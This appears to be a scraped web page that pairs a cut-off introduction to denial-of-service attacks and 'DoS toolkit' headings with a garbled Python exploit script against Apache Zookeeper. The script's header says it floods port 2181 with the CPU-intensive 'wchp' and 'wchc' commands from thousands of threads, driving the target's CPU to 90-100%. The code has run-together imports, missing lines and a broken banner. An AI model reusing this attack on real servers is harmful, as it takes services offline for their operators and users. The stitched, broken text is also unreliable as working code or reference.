Since the early days of the Internet, 'denial-of-service' (DoS) attacks have been a fact of life. The goal of these attacks is to restrict on a grand scale the availability of certain online systems and/or services or to.
Goodbye 3 / 5.2 Denial Of Service Tools
Goodbye 3 / 5.2 Denial Of Service Toolkit
- # Exploit Title: Zookeeper Client Denial Of Service (Port 2181)
- # Exploit Author: Brandon Dennis
- # Software Link: http://zookeeper.apache.org/releases.html#download
- # Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86
- # Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client.
- # This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic.
- # The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper.
- importos
- importsys
- exitStr ='n'
- threads =[]
- port =2181
- def sendCommand(ipAddress, port):
- s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- s.send('wchpr'.encode('utf-8'))
- s.send('wchcr'.encode('utf-8'))
- except:
- def runCMD(id, stop, ipAddress, port):
- sendCommand(ipAddress, port)
- break
- banner ='' _______ __ _____ _
- / / / / / /_ __ __ _ ___ __ ___ _ __
- ./ /__ __/ (_ __ __
- Email: bdennis@mail.hodges.edu
- print(banner)
- numOfThreads =int(input('How many threads do you want to use: '))
- for i inrange(numOfThreads):
- t =threading.Thread(target=runCMD, args=(id,lambda: stop_threads, ipAddress, port))
- t.start()
- while exitStr !='y':
- exitStr ='y'
- print('nStopping Threads...')
- forthreadin threads:
- sys.exit(0);